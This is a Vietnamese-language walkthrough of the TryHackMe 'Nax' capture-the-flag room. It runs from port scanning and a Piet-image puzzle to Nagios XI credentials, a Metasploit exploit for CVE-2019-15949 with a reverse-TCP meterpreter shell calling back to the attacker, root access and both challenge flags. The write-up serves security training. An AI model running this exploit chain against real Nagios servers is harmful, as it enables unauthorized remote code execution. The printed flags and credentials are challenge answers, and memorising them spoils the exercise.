Tryhackme - Nax
Hôm nay tôi sẽ giải CTF TryHackMe - Nax
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 62:1d:d9:88:01:77:0a:52:bb:59:f9:da:c1:a6:e3:cd (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCw9lXSbmWYgGcDpP5NiHE9MMRQktk72HpmKY50dVs/GbfJMNa29eJNKsZ2XfAVsGUuxRdX42/fvaAUOoSZlNlARJUOhS+3fRX14Qx9itHqEoYTXXnSZ+lYc4HGbMkbGlbW3CqQ6zxO9kEbe8DbFi9BPkGOvjMk5mrVYqOpROlZwJvwCtK4g+LNkZibj3VZvZ+Ex410r4Xqd4TeIe+NRVmCEG5I57w60wZTwS6WAhQ86Td8ZhDr0hlN82vKe8KK8Q6Qyt4NNa4GrwJAil0DMSSrSdgiFPWfSBN0RcaGq6xTyd3m4bUmKfqSJ+hhvpoQ5CJNQK5dtIfLulV5iEVWXKtV
| 256 af:67:7d:24:e5:95:f4:44:72:d1:0c:39:8d:cc:21:15 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA6AY/MaydX6jLtiYXUhTaSQuNB4h08nsJd8MIxQ4b77d5qBK89b0rXrmxH8TavI5HpHOnAYeSMWcgrWcKAnBXk=
| 256 20:28:15:ef:13:c8:9f:b8:a7:0f:50:e6:2f:3b:1e:57 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICcps6PPy9z/iS7bgKohT/GXERf6a6hWzhuWyeNMtzcw
25/tcp open smtp syn-ack ttl 63 Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-03-23T23:42:04
| Not valid after: 2030-03-21T23:42:04
| MD5: 9b85:15ad:46a7:016e:319a:033d:7d96:edbe
| SHA-1: c488:0c2d:a210:38dd:cfbb:a299:4a2a:b69c:63fd:2cdc
| -----BEGIN CERTIFICATE-----
| MIICsjCCAZqgAwIBAgIJAMztBzdUafrfMA0GCSqGSIb3DQEBCwUAMBExDzANBgNV
| BAMMBnVidW50dTAeFw0yMDAzMjMyMzQyMDRaFw0zMDAzMjEyMzQyMDRaMBExDzAN
| BgNVBAMMBnVidW50dTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAM4f
| Mj+6LmA7krMf32EdXKtdfPVFVFf3367a+trh4/H6MHZJVOpZ+CrH1j4RTjr9SONC
| l5Fzrz1hR1o1oXIwsAXrtqcvYGeNT7gwH4D6m6zifSaOAWEy/IMsbe3+sPMIUPlS
| 4NdFl4J6PeyeAAnShUzAOAdUqsvSsAmmvN3ze+Y2OGGfOlO1s7n25FDs72zXo2nX
| i1EO+1mVdUWuM/Qr8Zctilwv9QNPWxcoTG/Zac/q8/pboWaUg3pf6mfFLbwo96ba
| 8p8QR8gfD1Vc1xQMN98/2lPxo8ISkW9ffcBzy0ILIhkSD/8EmynmC7FhgogCU+/l
| fYpeC3wLLigkDZnOgL0CAwEAAaMNMAswCQYDVR0TBAIwADANBgkqhkiG9w0BAQsF
| AAOCAQEABDjkkOLVJfqNq1qSDGBgu7IJCG1CAByl82DGlam2nsVBhji54hviiyBi
| euCyeqJRPOX2qS7Kl0scMFw+DVxNW867HcrtTYEHuo1gOCGX3QFz+eUuKf+4X1Wr
| a7VgSeYVhboT4w4tKm8Rprh7QkHp9MNTB9TR/edG9RtFJZXtSlykeS5lLeC3DjRw
| 0NhWpgG2ZLa9URDrpzErvVwOBN46IS0PqwDCxJSvsH6sBQhgrm5so71jrPHwmh/o
| aaqO96Rw+1aRRLwz0O0TEO4aMw8/seeiRJ8w4kXMOy9UrCM5+yW6fbtMKYsmEPJO
| RxSanrURYb9UJxdRfeWPqWYU1AHVwg==
|_-----END CERTIFICATE-----
|_smtp-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_smtp-commands: ubuntu.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
389/tcp open ldap syn-ack ttl 63 OpenLDAP 2.2.X - 2.3.X
443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=192.168.85.153/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US/organizationalUnitName=Development/localityName=St. Paul
| Issuer: commonName=192.168.85.153/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US/organizationalUnitName=Development/localityName=St. Paul
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-03-24T00:14:58
| Not valid after: 2030-03-22T00:14:58
| MD5: 636c:ab0f:6399:34e3:b6de:e6e2:b294:d4ef
| SHA-1: 80cd:2e1b:110f:1b5f:1943:1b3f:c218:71e7:8b98:6801
| -----BEGIN CERTIFICATE-----
| MIIDzTCCArWgAwIBAgIBADANBgkqhkiG9w0BAQUFADCBgDELMAkGA1UEBhMCVVMx
| EjAQBgNVBAgMCU1pbm5lc290YTERMA8GA1UEBwwIU3QuIFBhdWwxGzAZBgNVBAoM
| Ek5hZ2lvcyBFbnRlcnByaXNlczEUMBIGA1UECwwLRGV2ZWxvcG1lbnQxFzAVBgNV
| BAMMDjE5Mi4xNjguODUuMTUzMB4XDTIwMDMyNDAwMTQ1OFoXDTMwMDMyMjAwMTQ1
| OFowgYAxCzAJBgNVBAYTAlVTMRIwEAYDVQQIDAlNaW5uZXNvdGExETAPBgNVBAcM
| CFN0LiBQYXVsMRswGQYDVQQKDBJOYWdpb3MgRW50ZXJwcmlzZXMxFDASBgNVBAsM
| C0RldmVsb3BtZW50MRcwFQYDVQQDDA4xOTIuMTY4Ljg1LjE1MzCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBANdnw2CkJpNnnwjJ+PaxonTH/G5TSKLru67c
| aQyy4FhI/xa+0Dwn/HjWnWIOE3gOQB7QyOyG30guUpFohUEtC9agL7tpogpxrV8l
| ie0vhXsz0ETdzMhaou6QOrLS1OSspAh+t492t71BILl6ReHPLoFyEghyRctP/iK0
| PelUJKndJ2ElpLdbkMUuVzQ9mp8qIjoTF4CS1JwiUESCtikRmZWp398buklzNGgF
| VZIRJPu5VZMPGc7Ui3QUSaTF2aqi9FRXZRXN+0q2nWvdUFrUqnzrmaVynOupGXhS
| O17VZtC9F/GM+yWpg3Lck9wevt5o3nnYW4k8h5kDNHu4f0oDR88CAwEAAaNQME4w
| HQYDVR0OBBYEFFRhBQ3MZkrfjRqOlHjApJZAN+juMB8GA1UdIwQYMBaAFFRhBQ3M
| ZkrfjRqOlHjApJZAN+juMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEB
| ABeWyFzGfxf3vmGuLXdDXVj5e1LwBlvoNmHGf11Buy/yljpUI6jg1HxUTSABU/iS
| ZSsCnwOQ5dtqRAIcvFp07ZlUw9DpeSChj2jxXw+YxINOSqqNgE66zelXV9rJb7TX
| HWho2/g6OzKs5ii2h5lyjlValQAgfxBYJpRjvf4FfIJpzL+RnrsOqJBNUurbAn1L
| yNkqSDJhCPNN/g0V6eyOZRjTipV2FzcHYrbt84qFPN8gQ5Rpd6wNOWoUfuY1tL6H
| yepaZ/iLv+wY60Kxd8+GD4Oy7Tpz+Ilkr48EIUffejHzVrcn7JikS8+Uf8nvDi9Q
| LnC7LykFocxS13IXPcTfrnI=
|_-----END CERTIFICATE-----
|_http-title: 400 Bad Request
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_ssl-date: TLS randomness does not represent time
5667/tcp open tcpwrapped syn-ack ttl 63
Service Info: Host: ubuntu.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Có khá nhiều port đang mở, nhưng tôi sẽ thử đi qua các port của web service trước là 80 và 443. Truy cập vào trang web, tôi nhận được một vài gợi ý (hoặc ít nhất là tôi nghĩ vậy)
Welcome to elements.
Ag - Hg - Ta - Sb - Po - Pd - Hg - Pt - Lr
Có thể nhận ra ngay đây là các ký hiệu đại diện của các nguyên tố trong bảng tuần hoàn hóa học. Mỗi nguyên tố đều có số hiệu nguyên tử riêng. Tôi có thể dựa vào nó để tạo ra 1 dãy số mới
Ag - Hg - Ta - Sb - Po - Pd - Hg - Pt - Lr
47 80 73 51 84 46 80 78 103
Convert dãy số trên thành ascii, tôi có hidden file
PI3T.PNg
Tải file ảnh này về và dùng exiftool để phân tích
┌──(root㉿kali)-[/home/kali]
└─# exiftool Downloads/PI3T.PNg
ExifTool Version Number : 12.57
File Name : PI3T.PNg
Directory : Downloads
File Size : 982 kB
File Modification Date/Time : 2023:07:21 13:50:34-04:00
File Access Date/Time : 2023:07:21 13:50:34-04:00
File Inode Change Date/Time : 2023:07:21 13:50:34-04:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 990
Image Height : 990
Bit Depth : 8
Color Type : Palette
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Palette : (Binary data 768 bytes, use -b option to extract)
Transparency : (Binary data 256 bytes, use -b option to extract)
Artist : Piet Mondrian
Copyright : Piet Mondrian, tryhackme 2020
Image Size : 990x990
Megapixels : 0.980
Ở đây tôi có người tạo ra file này
Piet Mondrian
Tiếp theo tôi cần convert file ảnh này sang ppm. Có thể dùng các web convert trên mạng ví dụ như Convertio — File Converter
Mất một lúc tìm kiếm xung quanh cái tên Piet và ppm format thì tôi tìm được một công cụ, hay đúng hơn là ngôn ngữ lập trình màu sắc
Tải nó về và giải nén
┌──(root㉿kali)-[/home/kali]
└─# ./npiet /Downloads/PI3T.ppm
nagiosadmin%n3p3UQ&9BjLp4$7uhWdYnagiosadmin%n3p3UQ&9BjLp4$7uhWdYnagiosadmin
username: nagiosadmin password: n3p3UQ&9BjLp4$7uhWdY
Thử truy cập nagios
Ngay trên trang chủ của Nagios có hiện phiên bản hiện tại là 4.4.2. Thử tìm các lỗ hổng với Nagios 4.4.2 và tôi tìm thấy CVE-2019-15949
Sử dụng Metasploit để tìm CVE này, tôi tìm được module
exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce)
Cấu hình các thông số trong exploit
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > show options
Module options (exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FINISH_INSTALL false no If the Nagios XI installation has not been completed, try to do so. This includes signing the license agreement.
PASSWORD n3p3UQ&9BjLp4$7uhWdY yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.208.133 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
URIPATH no The URI to use for this exploit (default is random)
USERNAME nagiosadmin yes Username to authenticate with
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.8.105.194 yes The listen address (an interface may be specified)
LPORT 6666 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux (x64)
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > run
[*] Started reverse TCP handler on 10.8.105.194:6666
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.5.6.
[+] The target appears to be vulnerable.
[*] Uploading malicious 'check_ping' plugin...
[*] Command Stager progress - 100.00% done (897/897 bytes)
[+] Successfully uploaded plugin.
[*] Executing plugin...
[*] Waiting up to 300 seconds for the plugin to request the final payload...
[*] Sending stage (3045348 bytes) to 10.10.208.133
[*] Meterpreter session 1 opened (10.8.105.194:6666 -> 10.10.208.133:56918) at 2023-07-21 16:32:40 -0400
[*] Deleting malicious 'check_ping' plugin...
[+] Plugin deleted.
meterpreter > shell
Process 2440 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
pwd
/root
ls -la
total 28
drwx------ 4 root root 4096 Mar 24 2020 .
drwxr-xr-x 23 root root 4096 Mar 23 2020 ..
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
drwxr-xr-x 2 root root 4096 Mar 24 2020 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 38 Mar 24 2020 root.txt
drwxr-xr-x 2 root root 4096 Mar 23 2020 scripts
cat root.txt
THM{c89b2e39c83067503a6508b21ed6e962}
ls -la /home
total 12
drwxr-xr-x 3 root root 4096 Mar 23 2020 .
drwxr-xr-x 23 root root 4096 Mar 23 2020 ..
drwxr-xr-x 8 galand galand 4096 Mar 24 2020 galand
ls -la /home/galand
total 56
drwxr-xr-x 8 galand galand 4096 Mar 24 2020 .
drwxr-xr-x 3 root root 4096 Mar 23 2020 ..
-rw------- 1 root root 481 Mar 24 2020 .bash_history
-rw-r--r-- 1 galand galand 220 Mar 23 2020 .bash_logout
-rw-r--r-- 1 galand galand 3771 Mar 23 2020 .bashrc
drwx------ 2 galand galand 4096 Mar 23 2020 .cache
drwxr-xr-x 6 root root 4096 Mar 23 2020 .cpan
drwx------ 2 root root 4096 Mar 23 2020 .gnupg
drwxrwxr-x 2 galand galand 4096 Mar 24 2020 .nano
-rw-r--r-- 1 galand galand 655 Mar 23 2020 .profile
-rw------- 1 root root 1024 Mar 23 2020 .rnd
drwxr-xr-x 3 root root 4096 Mar 23 2020 .subversion
-rw-r--r-- 1 galand galand 0 Mar 23 2020 .sudo_as_admin_successful
drwxr-xr-x 9 galand galand 4096 Mar 23 2020 nagiosxi
-rw-rw-r-- 1 galand galand 38 Mar 24 2020 user.txt
cat /home/galand/user.txt
THM{84b17add1d72a9f2e99c33bc568ae0f1}